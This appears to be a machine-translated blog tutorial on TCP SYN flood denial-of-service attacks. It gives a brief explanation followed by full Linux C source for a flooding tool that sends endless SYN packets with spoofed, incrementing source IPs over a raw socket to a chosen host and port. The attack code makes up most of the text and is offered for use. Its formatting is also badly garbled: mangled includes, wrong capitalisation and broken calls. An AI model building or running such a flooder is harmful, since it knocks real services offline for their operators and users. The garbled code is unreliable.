Synflood-DDoS flood attacks (Linux C)

First, synflood attacks are the most common DoS attacks. As mentioned in the previous article, the principle is to send flood SYN requests to the target host in a short time. We all know that TCP is a connection-oriented protocol, the connection is established, but malicious attackers will deliberately forge IP addresses, so that the attacked host cannot get the last handshake. Instead, they can allocate memory for the incoming SYN and send SYN + ACK, in this way, the ACK confirmation for the third handshake is not available.

/*************************************** * ******************************** // * Synflood. C * // * @ 2013-03-21 *//****************************** **************************************** **/# include <stdio. h> # include <errno. h> # include <sys/time. h> # include <sys/socket. h> // socket-related function declaration and struct definition # include <netinet/in. h> // declaration of some struct, macro definition such as struct sockaddr_in # include <netdb. h> // some struct definitions. The macro definition and definition are as follows: struct hostent # include <ctype. h> # include <Sys/types. h> // contains many types of redefinition # include <stdlib. h> # include <ARPA/inet. h> // some function declarations, such as inet_ntoa () # include <netinet/IP. h> # include <netinet/TCP. h> # include <string. h> # define fake_ip "10.0.11.20" // start value of the disguised IP Address: typedef unsigned short ushort; typedef unsigned char uchar; typedef unsigned long ulong; typedef unsigned int uint; int fakeipnet; int fakeiphost; int sendseq; // send the serial number static inline long myrandom (INT begin, int end) {// int ga P = end-begin + 1; int ret = 0; // Random Seed srand (unsigned) Time (null); ret = rand () % end + begin; // generate a return ret value between begin and end;} // calculate the static ushort chksum (ushort * data, ushort length) {int nleft = length; int sum = 0; ushort * word = data; ushort ret = 0; // calculate the even number of bytes while (nleft> 1) {sum + = * word ++; nleft-= 2;} // if the number of digits is odd, calculate the last byte separately. The remaining byte height byte constructs a short type variable value if (nleft = 1) {* (uchar *) (& RET) = * (Uchar *) word; sum + = ret;} // fold sum = (sum> 16) + (sum & 0 xFFFF ); sum + = (sum> 16); // returns the reverse ret = ~ SUM; Return (RET);} void sendsynfunc (INT sockfd, struct sockaddr_in * ADDR) {int count; // count the number of sending cycles char Buf [40]; // calculate and verify char sendbuf [100]; struct IP * IP; struct tcphdr * TCP; struct prehdr // TCP pseudo header {struct sockaddr_in sourceaddr; // source address struct sockaddr_in destaddr; // target address: uchar zero; uchar protocol; ushort length;} prehdr; int Len = sizeof (struct IP) + sizeof (struct tcphdr ); // start filling in the IP address and TCP Header bzero (BUF, sizeof (B UF); bzero (sendbuf, sizeof (sendbuf); IP = (struct IP *) sendbuf; // point to the IP address of the sending buffer header-> ip_v = 4; IP-> ip_hl = 5; IP-> ip_tos = 0; IP-> ip_len = htons (LEN); IP-> ip_id = 0; IP-> ip_off = 0; // enter the kernel IP address> ip_ttl = myrandom (128,255); IP address> ip_p = ipproto_tcp; IP address> ip_sum = 0; IP address> ip_dst = ADDR-> sin_addr; // target address, that is, the target printf ("ipheader fill finished \ n"); TCP = (struct tcphdr *) (sendbuf + sizeof (struct IP )); // obtain the pointer to the TCP Header -> Seq = htonl (ulong) myrandom (0,65535); TCP-> DEST = ADDR-> sin_port; // destination port TCP-> ack_seq = htons (myrandom (); TCP-> SYN = 1; TCP-> URG = 1; TCP-> window = htons (myrandom (); TCP-> check = 0; // checksum TCP-> urg_ptr = htons (myrandom )); // while (1) {If (sendseq ++ = 65535) sendseq = 1; // serial number loop // update the IP Address Header IP-> ip_src.s_addr = htonl (fakeiphost + sendseq); // ip address of each random source IP address-> ip_sum = 0; // update the TCP Header Part TCP-> seq = htonl (0x12345678 + sendseq); TCP-> check = 0; // ip-> ip_src.s_addr = myrandom ); printf ("Source ADDR is: % s \ n", inet_ntoa (IP-> ip_src); printf ("dest addr is: % s \ n ", inet_ntoa (ADDR-> sin_addr )); printf ("\ n ===============================\ N "); // TCP pseudo-header data filling prehdr. sourceaddr. sin_addr = IP-> ip_src; prehdr. destaddr. sin_addr = ADDR-> sin_addr; prehdr. zero = 0; prehdr. protocol = 4; prehdr. length = Sizeof (struct tcphdr); // encapsulate TCP header and pseudo header to Buf; memcpy (BUF, & prehdr, sizeof (prehdr); memcpy (BUF + sizeof (prehdr ), & TCP, sizeof (struct tcphdr); TCP-> check = chksum (u_short *) & Buf, 12 + sizeof (struct tcphdr )); // checksum calculation // encapsulate IP and TCP Header packets to sendbuf memcpy (sendbuf, & IP, sizeof (IP); memcpy (sendbuf + sizeof (IP), & TCP, sizeof (TCP); sendto (sockfd, sendbuf, Len, 0, (struct sockaddr *) & ADDR, sizeof (struct sockaddr);} int main (I NT argc, char * argv []) {struct sockaddr_in ADDR; // destination host address int sockfd; struct hostent * Host; int on = 1; int ret; if (argc <3 | argc> 3) {printf ("Usage: synflood desthostip desthostport \ n"); return 1;} bzero (& ADDR, sizeof (ADDR )); ADDR. sin_family = af_inet; ADDR. sin_port = htons (atoi (argv [2]); // disguise IP fakeipnet = inet_addr (fake_ip); fakeiphost = ntohl (fakeipnet ); if (ret = inet_aton (argv [1], & ADDR. si N_addr ))! = 0) {If (host = gethostbyname (argv [1]) = NULL) {printf ("desthost name error: % S % s \ n ", argv [1], hstrerror (h_errno); return 1 ;}else {memcpy (char *) & ADDR. sin_addr, (host-> h_addr_list) [0], host-> h_length);} // set the original socket, and set the option to IP Option sockfd = socket (af_inet, sock_raw, ipproto_tcp); // If (sockfd <0) {printf ("socket error \ n"); return 1 ;} // ip_hdrincl contains the IP header setsockopt (sockfd, ipproto_ip, ip_hdrincl, & on, sizeof (on); setuid (getpid (); sendsynfunc (sockfd, & ADDR);} return 0 ;}

It is worth mentioning that, because we created the original socket sock_raw (which can receive data frames or data packets on the local Nic), we must execute this program as root, otherwise, the socket cannot be created successfully.